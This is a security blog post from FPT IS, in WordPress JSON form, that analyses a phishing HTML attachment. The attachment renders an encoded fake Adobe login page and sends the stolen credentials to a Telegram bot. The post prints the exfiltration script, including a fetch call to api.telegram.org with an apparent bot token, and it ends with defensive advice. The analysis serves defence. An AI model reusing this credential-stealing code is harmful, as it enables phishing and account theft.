{"id":20202,"date":"2025-05-27T10:00:20","date_gmt":"2025-05-27T03:00:20","guid":{"rendered":"https:\/\/fpt-is.com\/en\/?post_type=goc_nhin_so&#038;p=20202"},"modified":"2025-06-02T11:36:22","modified_gmt":"2025-06-02T04:36:22","slug":"html-attachments-in-phishing-emails-steal-information-and-send-it-to-telegram-channels","status":"publish","type":"goc_nhin_so","link":"https:\/\/fpt-is.com\/en\/insights\/html-attachments-in-phishing-emails-steal-information-and-send-it-to-telegram-channels\/","title":{"rendered":"HTML attachments in phishing emails steal information and send it to Telegram channels."},"content":{"rendered":"<div id=\"post-content-wrapper\" class=\"prose prose-base mx-auto mb-10 min-h-30 break-words dark:prose-dark lg:prose-lg\">\n<p><span style=\"font-family: arial, helvetica, sans-serif\">For a long time, hackers have recognized that attaching HTML files to phishing emails can be highly effective and successful. Instead of luring victims to visit a malicious website or link, these HTML files can contain an entire webpage designed to steal the victim\u2019s login credentials. With the advantage of being able to function independently without an internet connection\u2014except for sending extracted information to a command-and-control (C2) server\u2014this method has become increasingly popular among cybercriminals.<\/span><\/p>\n<h2 id=\"heading-exploitation-method\" class=\"permalink-heading\"><span style=\"font-family: arial, helvetica, sans-serif\">Exploitation Method<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif\">New variants of the \u201cself-contained HTML phishing attachment\u201d method have continuously emerged over the years. Recently, in a blog\u00a0<a href=\"https:\/\/isc.sans.edu\/diary\/rss\/31388\" target=\"_blank\" rel=\"noopener nofollow\">post<\/a>\u00a0by SANS, security researchers reviewing phishing emails they had received identified a new variant due to its distinct characteristics.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-1-1739414965.jpg\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-20203\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-1-1739414965.jpg\" alt=\"Html Attachments In Phishing Emails Steal Information And Send It To Telegram Channels Fpt Is 1 1739414965\" width=\"1600\" height=\"625\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-1-1739414965.jpg 1600w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-1-1739414965-700x273.jpg 700w\" sizes=\"(max-width: 1600px) 100vw, 1600px\" \/><\/a><button type=\"button\" aria-label=\"Expand image\" data-rmiz-btn-zoom=\"\"><\/button>At first glance, this email appears similar to the phishing emails that users frequently receive daily. However, the attachment has a key difference. The file uses the\u00a0<code>.SHTML<\/code>\u00a0extension (likely modified to bypass filters that scan for\u00a0<code>.html<\/code> files) and contains only three script tags with embedded content.<\/span><\/p>\n<div>\n<div>\n<pre><span style=\"font-family: arial, helvetica, sans-serif\"><code class=\"lang-plaintext\">&lt;script&gt;\r\n     let zhe = [e-mail address of the recipient];\r\n&lt;\/script&gt;\r\n<\/code><\/span><\/pre>\n<\/div>\n<\/div>\n<p><span style=\"font-family: arial, helvetica, sans-serif\">The first script is responsible for setting the recipient&#8217;s email address.<\/span><\/p>\n<div>\n<div>\n<pre><span style=\"font-family: arial, helvetica, sans-serif\"><code class=\"lang-plaintext\">&lt;script language=\"javascript\"&gt;\r\ndocument.write(unescape('%3C%68\r\n...\r\n%0A%20'));\r\n&lt;\/script&gt;\r\n<\/code><\/span><\/pre>\n<\/div>\n<\/div>\n<p><span style=\"font-family: arial, helvetica, sans-serif\">The second script contains the content of the malicious webpage, encoded using URL encoding. It displays a fake login interface and prompts the user to enter their password, serving as an information-stealing mechanism while remaining simple enough to evade detection by standard security measures.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif\" data-rmiz=\"\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-2-1739414988.jpg\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-20204\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-2-1739414988.jpg\" alt=\"Html Attachments In Phishing Emails Steal Information And Send It To Telegram Channels Fpt Is 2 1739414988\" width=\"1600\" height=\"846\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-2-1739414988.jpg 1600w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-2-1739414988-700x370.jpg 700w\" sizes=\"(max-width: 1600px) 100vw, 1600px\" \/><\/a><br \/>\n<\/span><\/p>\n<div>\n<div>\n<pre><span style=\"font-family: arial, helvetica, sans-serif\"><code class=\"lang-plaintext\">&lt;script type=\"text\/javascript\"&gt;\r\n    ...\r\n     window.addEventListener('load', () =&gt; {\r\n        emailGrab.textContent = zhe;\r\n     });\r\n      let xyz = 6232213176;\r\n    let yxz = '6274096448:AAFIuDO3z8WR4lglrmpW3RvReWlVaHQVYJ0';\r\n    function telegramApi(method, id, message) {\r\n         fetch(`https:\/\/api.telegram.org\/bot${yxz}\/${method}?chat_id=${id}&amp;text=${message}&amp;parse_mode=HTML`);\r\n    }\r\n        button.addEventListener('click', () =&gt; {\r\n            const results = `Adobe EmailAddress: ${emailGrab.textContent} Adobe Password: ${passInput.value}`;\r\n        if (passInput.value === '') {\r\n                alert('The Following error(s) occured - Password Required')\r\n            }\r\n            else {\r\n                 telegramApi('sendMessage', xyz, results);\r\n                 ...\r\n        }\r\n        });\r\n        ...\r\n&lt;\/script&gt;\r\n<\/code><\/span><\/pre>\n<\/div>\n<\/div>\n<p><span style=\"font-family: arial, helvetica, sans-serif\">The uniqueness of this variant lies in the third script, as it contains almost no code obfuscation. Additionally, the stolen information is not sent to a hacker-controlled C2 server as usual but instead transmitted to a Telegram channel via a simple GET request to\u00a0<code>api.telegram.org<\/code>. This approach enables fast data exfiltration while making detection more difficult due to the secure nature of messaging platforms like Telegram.<\/span><\/p>\n<h2 id=\"heading-conclusion\" class=\"permalink-heading\"><span style=\"font-family: arial, helvetica, sans-serif\">Conclusion<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif\">Modern phishing campaigns continuously refine and expand their techniques to bypass security systems. The use of HTML attachments containing encoded malicious webpages to steal and transmit login credentials to messaging platforms like Telegram highlights the increasing sophistication and creativity of cybercriminals.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif\">With a simple yet effective approach, such malware easily evades traditional filters and leverages the widespread use of platforms like Telegram to avoid detection by monitoring systems. This serves as a reminder for organizations to focus more on monitoring unconventional communication channels. Implementing DNS or URL-level filtering to block connections to messaging platforms and monitoring network traffic can help detect suspicious activities early.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif\">Additionally, employees should be trained to recognize the signs of phishing attacks via email. As cyber threats grow more sophisticated, a comprehensive security strategy\u2014combining both technological defenses and user awareness\u2014is essential to protecting organizational systems and data.<\/span><\/p>\n<h2 id=\"heading-references\" class=\"permalink-heading\"><span style=\"font-family: arial, helvetica, sans-serif\">References<\/span><\/h2>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif\">SANS blog:\u00a0<a href=\"https:\/\/isc.sans.edu\/diary\/rss\/31388\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/isc.sans.edu\/diary\/rss\/31388<\/a><\/span><\/li>\n<\/ol>\n<table style=\"border-collapse: collapse;width: 100%\">\n<tbody>\n<tr>\n<td style=\"width: 100%\"><span style=\"font-family: arial, helvetica, sans-serif\"><strong>Exclusive article by FPT IS Technology Experts<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif\"><em>Nam Anh Mai D. \u2013 FPT IS Cyber Security Center<\/em><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<div class=\"-mt-5 mb-10\"><\/div>\n","protected":false},"author":21,"featured_media":21622,"parent":0,"template":"","nang_luc":[790,821],"danh_muc_goc_nhin_so":[789],"dich_vu":[],"linh_vuc":[],"platform":[],"san_pham":[],"the_goc_nhin_so":[],"class_list":["post-20202","goc_nhin_so","type-goc_nhin_so","status-publish","has-post-thumbnail","hentry","nang_luc-experts-sharing","nang_luc-security","danh_muc_goc_nhin_so-expert-sharing"],"acf":[],"_links":{"self":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so\/20202","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so"}],"about":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/types\/goc_nhin_so"}],"author":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/users\/21"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media\/21622"}],"wp:attachment":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media?parent=20202"}],"wp:term":[{"taxonomy":"nang_luc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/nang_luc?post=20202"},{"taxonomy":"danh_muc_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/danh_muc_goc_nhin_so?post=20202"},{"taxonomy":"dich_vu","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/dich_vu?post=20202"},{"taxonomy":"linh_vuc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/linh_vuc?post=20202"},{"taxonomy":"platform","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/platform?post=20202"},{"taxonomy":"san_pham","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/san_pham?post=20202"},{"taxonomy":"the_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/the_goc_nhin_so?post=20202"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}